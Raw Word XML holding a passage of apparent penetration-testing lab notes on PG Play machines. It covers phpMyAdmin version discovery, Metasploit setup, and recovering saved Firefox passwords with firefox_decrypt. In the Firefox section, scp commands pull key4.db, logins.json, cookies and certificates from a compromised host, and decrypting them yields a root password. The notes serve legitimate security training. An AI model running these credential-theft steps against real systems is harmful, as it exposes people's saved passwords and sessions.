      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> config files</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> because in "funbox-easyenum" PG play, we found credentials like that</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000048F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000490">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want a walkthrough on how to use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">phpMyAdmin GUI </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">after getting past the login page, then look at the </w:t>
      </w:r>
      <w:hyperlink r:id="rId84">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Election1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000491">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to get version number of phpMyAdmin:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000494">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2162051" cy="2800034"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="437" name="image424.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image424.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId85"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2162051" cy="2800034"/>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4907380" cy="1195388"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="64" name="image58.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image58.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId86"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4907380" cy="1195388"/>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r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000498">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004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A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000049B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_o746dlmg9p9n" w:id="34"/>
      <w:bookmarkEnd w:id="34"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Firefox and .mozilla (and firefox_decrypt)</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In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId87">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">InsanityHosting</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Play (on Vulnhub, it was called "Insanity: 1"), we saw a .mozilla file in the home directory of a compromised user. </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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If Firefox was used on this system and any entered user credentials were saved in the browser, it is possible to recover them. We can query these four files to see if that is the case (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cert9.db, cookies.sqlite, key4.db, logins.json</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">):</w:t>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color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ls .mozilla/firefox/esmhp32w.default-default | grep -E "logins.json|cert9.db|cookies.sqlite|key4.db"</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="622300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="185" name="image193.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image193.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId88"/>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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Indeed, it looks like the four files of interest are present, signifying that we might be able to recover some passwords. On our attacking machine, we can clone the repository of the tool that will help us in this attack - </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">firefox_decrypt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004A6">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="600" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">git clone</w:t>
      </w:r>
      <w:hyperlink r:id="rId89">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="ff0000"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId90">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="ff0000"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://github.com/unode/firefox_decrypt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004A7">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, let's copy the four files to our attacking machine for decrypting:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004A8">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="600" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">scp -o StrictHostKeyChecking=no -r elliot@192.168.195.124:/home/elliot/.mozilla/firefox/esmhp32w.default-default/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cert9.db </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/root/Desktop/Tools/firefox_decrypt/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004A9">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="600" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">scp -o StrictHostKeyChecking=no -r elliot@192.168.195.124:/home/elliot/.mozilla/firefox/esmhp32w.default-default/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cookies.sqlite</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /root/Desktop/Tools/firefox_decrypt/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004AA">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="600" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">scp -o StrictHostKeyChecking=no -r elliot@192.168.195.124:/home/elliot/.mozilla/firefox/esmhp32w.default-default/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">key4.db </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/root/Desktop/Tools/firefox_decrypt/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004AB">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:right="600" w:firstLine="0"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">scp -o StrictHostKeyChecking=no -r elliot@192.168.195.124:/home/elliot/.mozilla/firefox/esmhp32w.default-default/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">logins.json</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /root/Desktop/Tools/firefox_decrypt/</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Move all file in single folder:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004AE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">mv cert9.db cookies.sqlite key4.db logins.json ./fir</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004B0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Once the files have been transferred, we can run the tool as follows:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004B1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 firefox_decrypt.py fir/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004B2">
      <w:pPr>
        <w:rPr/>
      </w:pP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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1244600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="329" name="image313.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image313.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId91"/>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4B6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004B7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It looks like we have recovered the root user password. We can confirm this by logging in as root in our SSH shell!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004B8">
      <w:pPr>
        <w:rPr/>
      </w:pP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B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_estzwrn7ndbm" w:id="35"/>
      <w:bookmarkEnd w:id="35"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit</w:t>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hyperlink r:id="rId92">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Cheatsheet </w:t>
        </w:r>
      </w:hyperlink>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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Download Metasploit packages, including msfvenom</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="149"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install metasploit-framework</w:t>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b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Tip:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1186"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For RHOSTS, since it asks for HOSTS, then you don't need to include the http://</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004C4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1186"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it asks for TARGETURI (without the RHOSTS) or something like that, then include http://</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004C5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1186"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But if it asks for both RHOSTS and TARGETURI, then you might just put a "/" for TARGETURI if the target is just the website without any path</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004C6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004C7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_xrsarjvcr77" w:id="36"/>
      <w:bookmarkEnd w:id="36"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Basics</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004C8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004C9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to initialize metasploit (run these on fresh machines that haven't run metasploit yet):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004CA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="740"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo msfdb init</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004CB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="740"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo systemctl enable postgresql</w:t>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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to start metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000004CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="139"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo msfconsole -q</w:t>
      </w:r>
    </w:p>
